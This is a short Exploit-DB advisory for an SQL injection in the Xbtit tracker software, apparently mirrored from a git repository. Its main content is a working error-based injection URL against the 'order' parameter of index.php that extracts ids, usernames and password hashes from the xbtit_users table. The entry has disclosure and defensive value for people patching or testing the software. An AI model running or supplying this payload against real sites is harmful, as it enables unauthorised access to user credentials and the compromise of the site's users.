exploit-db-mirror/exploits/php/webapps/11718.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

16 lines
No EOL
740 B
Text

####################################################
# Title : Xbtit SQL Injection Vulnerability #
# Author : Ctacok #
# Homepage : http://ctacok.ru/ #
####################################################
####################################################
# Vulnerable File :
/index.php?page=users&order=[SQL]&by=ASC
####################################################
# ExploiT :
/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC
####################################################